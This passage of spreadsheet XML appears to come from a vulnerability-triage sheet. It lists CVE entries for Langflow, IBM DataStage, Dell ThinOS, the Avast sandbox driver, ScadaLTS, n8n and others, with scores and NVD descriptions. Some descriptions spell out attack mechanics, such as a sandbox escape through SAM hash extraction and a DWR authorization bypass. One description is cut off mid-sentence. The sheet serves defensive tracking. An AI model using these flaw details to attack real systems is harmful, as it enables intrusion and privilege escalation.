      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary commands due to improper validation of command-line arguments in the MCP stdio server configuration.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78575</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79742</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an incomplete environment variable blocklist.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79742</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81048</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Remote Code execution</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81048</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81211</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary Python code due to improper authorization of custom components in stored flows.</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81211</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81550</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81550</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81940</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special characters in flow display names.</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81940</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81941</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 allows an authenticated non-administrative user could execute arbitrary operating system commands on the server at the privilege level of the application process by constructing a flow with an MCP Tools component configured to use a local stdio subprocess transport. This bypasses both the LANGFLOW_CUSTOM_COMPONENT_ADMIN_ONLY and LANGFLOW_BLOCK_CODE_INTERPRETER_COMPONENTS server-side controls intended to prevent exactly this class of access. Successful exploitation could lead to arbitrary command execution, sensitive data exposure (including credentials from the process environment), file system modification, and lateral movement to services reachable from the server.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81941</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82095</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82095</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82097</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to a Server-Side Request Forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82097</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82098</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82098</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82099</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82099</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82964</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>security@nortonlifelock.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-653, CWE-862</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>Improper preservation of permissions in the Avast sandbox minifilter driver (aswSnx.sys) on Windows allows a local, low-privileged attacker executing inside the sandbox to escape file isolation and escalate to SYSTEM.
When the sandbox virtualizes a file it copies the original security descriptor, but the driver opened the virtualization target object with GENERIC_WRITE and FILE_WRITE_ATTRIBUTES only, omitting WRITE_DAC. Every attempt to apply the original DACL therefore failed, and the failure was discarded silently, leaving virtualized copies of sensitive files with permissive permissions. Because the IRP_MJ_CREATE callback additionally did not strip WRITE_DAC for sensitive directories, a sandboxed process could rewrite the security descriptor of a virtualized object, read the virtualized copy of the SAM database, extract local NTLM password hashes and execute code as SYSTEM.
The absence of an IRP_MJ_SET_SECURITY callback in the driver's operation registration table is a related defense-in-depth gap, but it is not the control that prevents this attack.</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82964</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83941</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84858</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>ScadaLTS 2.8.1-release-candidate build 0 is affected by an Authenticated Remote Code Execution via Scripting Sandbox Bypass
The DWR "DataSourceEditDwr" class exposes the "validateScript" method that compiles and executes attacker-supplied JavaScript via the Rhino scripting engine. There are no authorization checks on this method and so it is possible for an attacker with access to a low privilege user to abuse this flaw by leveraging the DWR routing bypass.</t>
        </is>
      </c>
      <c r="S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84858</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84860</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>ScadaLTS 2.8.1-release-candidate build 0 is affected by an Authorization Bypass
Spring Security gates DWR endpoints by URL path pattern, but DWR itself dispatches method calls based on the POST body parameters c0-scriptName and c0-methodName. The crossDomainSessionSecurity setting in web.xml is set to false, which disables DWR's built-in origin validation. This means any authenticated user can invoke any DWR method (regardless of the URL-based access control) by sending their request to a URL they are permitted to access (e.g. MiscDwr.initializeLongPoll.dwr) while targeting a restricted class in the POST body.
This is the systemic root cause that enables multiple other findings to be exploited as a low privilege user.</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84860</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85168</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 contain a remote code execution vulnerability in the Git node. The node reset a fixed list of command-bearing configuration keys before each operation, but that list did not cover the content-filter and merge-driver key families. A repository with local configuration setting one of those keys together with a matching attribute pattern causes git to execute the configured command during an ordinary Add, Commit, Checkout, or Pull operation. The command runs as the n8n process user.</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85168</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85731</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>oras-go is</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85731</t>
        </is>
      </c>
    </row>
    <row r="208">
